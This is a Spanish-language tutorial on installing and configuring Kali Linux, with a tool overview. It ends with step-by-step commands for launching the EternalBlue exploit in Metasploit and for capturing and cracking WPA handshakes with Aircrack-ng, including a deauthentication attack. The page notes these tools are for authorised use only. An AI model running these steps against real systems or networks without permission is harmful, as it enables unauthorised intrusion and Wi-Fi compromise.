¿Qué es Kali Linux?
Kali Linux es una distribución basada en Debian diseñada específicamente para pentesting y análisis forense digital, desarrollada por Offensive Security.
- +600 herramientas preinstaladas
- Soporte para ARM (Raspberry Pi, Android)
- Entorno personalizado para seguridad
Descargar Kali Linux
Versión actual: 2023.3
Instalación
Instalación en Hardware
- Descargar imagen ISO desde kali.org
- Crear USB booteable con:
dd if=kali-linux-2023.3-installer-amd64.iso of=/dev/sdX bs=4M status=progress - Seguir el asistente gráfico (se recomienda cifrado LUKS)
Configuración en VirtualBox
- Asignar mínimo 2 CPUs y 4GB RAM
- Habilitar PAE/NX en configuración del sistema
- Configurar red en modo Bridge para pruebas reales
- Instalar Guest Additions para mejor rendimiento:
sudo apt update && sudo apt install -y virtualbox-guest-x11
Kali en WSL 2 (Windows)
- Activar WSL 2 en PowerShell como admin:
wsl --install - Descargar Kali desde Microsoft Store
- Iniciar sesión con usuario creado durante instalación
- Limitación: No soporta herramientas que requieran interfaz gráfica o acceso a hardware RAW
Modo Live Persistente
Permite guardar cambios en un USB:
# Crear partición persistente (mínimo 8GB)
gparted /dev/sdX # Crear partición EXT4 con label "persistence"
mkdir -p /mnt/usb
mount /dev/sdX3 /mnt/usb
echo "/ union" > /mnt/usb/persistence.conf
umount /mnt/usb
Configuración Inicial
sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y
sudo useradd -m -G sudo -s /bin/bash tu_usuario
sudo passwd tu_usuario
¡Importante! Evitar usar root para operaciones diarias.
Para ocultar tu dirección MAC:
sudo systemctl stop NetworkManager
sudo macchanger -r wlan0
sudo systemctl start NetworkManager
Herramientas Clasificadas
| Categoría | Herramienta | Comando | Uso |
|---|---|---|---|
| Reconocimiento | Nmap | nmap -sV 192.168.1.1 |
Escaneo de puertos |
| Análisis Web | Burp Suite | burpsuite |
Testing de aplicaciones |
| Explotación | Metasploit | msfconsole |
Framework de exploits |
| Wireless | Aircrack-ng | airmon-ng start wlan0 |
Auditoría WiFi |
Legalidad: Solo usar estas herramientas en redes propias o con permiso explícito.
Comandos Útiles
Gestión de Paquetes
# Buscar herramientas
sudo apt search "pentest"
# Instalar herramienta específica
sudo apt install metasploit-framework
# Ver herramientas instaladas
apt list --installed | grep kali-tools
Servicios
# Iniciar/parar PostgreSQL (necesario para Metasploit)
sudo systemctl start postgresql
# Ver estado de servicios
systemctl list-units --type=service
Personalización
# Cambiar shell a ZSH
sudo apt install zsh
chsh -s $(which zsh)
# Instalar Oh My ZSH
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
Contenido Técnico Destacado
1. Configuración de Entorno
# Configurar alias útiles en ~/.zshrc
alias ll='ls -la'
alias updatekali='sudo apt update && sudo apt full-upgrade -y'
alias myip='ip -br -c a'
2. Uso de Metasploit
# Iniciar Metasploit con PostgreSQL
sudo systemctl start postgresql
msfdb init
msfconsole
# Comandos básicos en msf
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.100
msf6 exploit > exploit
3. Auditoría WiFi con Aircrack-ng
# Poner interfaz en modo monitor
sudo airmon-ng start wlan0
# Escanear redes
sudo airodump-ng wlan0mon
# Capturar handshake (para WPA/WPA2)
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura wlan0mon
# En otra terminal:
sudo aireplay-ng -0 4 -a 00:11:22:33:44:55 -c FF:FF:FF:FF:FF:FF wlan0mon
# Crackear con diccionario
sudo aircrack-ng -w diccionario.txt captura-01.cap